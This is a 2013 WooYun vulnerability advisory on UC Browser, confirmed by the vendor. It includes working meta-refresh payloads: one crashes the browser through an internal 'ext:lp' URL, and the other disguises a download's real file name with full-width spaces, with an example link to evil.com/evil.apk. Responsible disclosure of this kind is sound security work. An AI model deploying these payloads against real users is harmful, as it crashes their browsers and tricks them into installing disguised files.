当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-032477

漏洞标题:UC浏览器打开特定网页导致拒绝服务

相关厂商:UC Mobile

漏洞作者: evavus

提交时间:2013-07-27 11:26

修复时间:2013-10-25 11:27

公开时间:2013-10-25 11:27

漏洞类型:拒绝服务

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-07-27: 细节已通知厂商并且等待厂商处理中
2013-07-27: 厂商已经确认,细节仅向厂商公开
2013-07-30: 细节向第三方安全合作伙伴开放
2013-09-20: 细节向核心白帽子及相关领域专家公开
2013-09-30: 细节向普通白帽子公开
2013-10-10: 细节向实习白帽子公开
2013-10-25: 细节向公众公开

简要描述:

UC浏览器打开特定网页会导致自动退出

详细说明:

在UC浏览器中打开下面的链接会导致退出UC浏览器。

ext:lp:lp_netErrorInfo:#_NETWORK_FAIL_INFO_#;Url=http://www.wooyun.org;IP=null;IPNum=0; ;FailReason=OpenConnection;ErrorCode=010101010101;


所以可以在恶意网页构造下面代码。

<meta http-equiv="refresh" content="0;URL=ext:lp:lp_netErrorInfo:#_NETWORK_FAIL_INFO_#;Url=http://www.wooyun.org;IP=null;IPNum=0; ;FailReason=OpenConnection;ErrorCode=010101010101;"/>


打开即可退出UC浏览器,也可以用二维码。

ucbrowser.png


还有一处下载文件名欺骗
在UC浏览器中可以使用下面链接进行下载。

ext:uc_dw:http://www.evil.com/evil.apk


UC浏览器下载时会忽略半角空格后面的内容,但是全角空格却没有被忽略,可以在恶意网页构造下面代码

<meta http-equiv="refresh" content="0;URL=ext:uc_dw:http://fuzzing.duapp.com/evil.txt%E3%80%80%E3%80%80%E3%80%80%E3%80%80%E3%80%80%E3%80%80%E3%80%80%E3%80%80%E3%80%80%E3%80%80%E3%80%80%E3%80%80%E3%80%80%E3%80%80%E3%80%80.html"/>


打开就会提示下载。

1.jpg


其实下载的是

2.jpg

漏洞证明:

非极速模式下打开

http://fuzzing.duapp.com/ucbrowser.html


http://fuzzing.duapp.com/down.html

修复方案:

版权声明:转载请注明来源 evavus@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2013-07-27 13:23

厂商回复:

漏洞存在,已联系研发处理,非常感谢evavus提供漏洞信息。

最新状态:

暂无


漏洞评价:

评论

  1. 2013-07-27 11:47 | evavus ( 实习白帽子 | Rank:80 漏洞数:11 | @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@...)

    @UC Mobile PS:可以用ext:switch_quickmode关闭/开启 极速模式

  2. 2013-07-27 12:08 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    @evavus - - 等等我上号确认

  3. 2013-07-27 12:31 | evavus ( 实习白帽子 | Rank:80 漏洞数:11 | @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@...)

    @mango 你是UC的?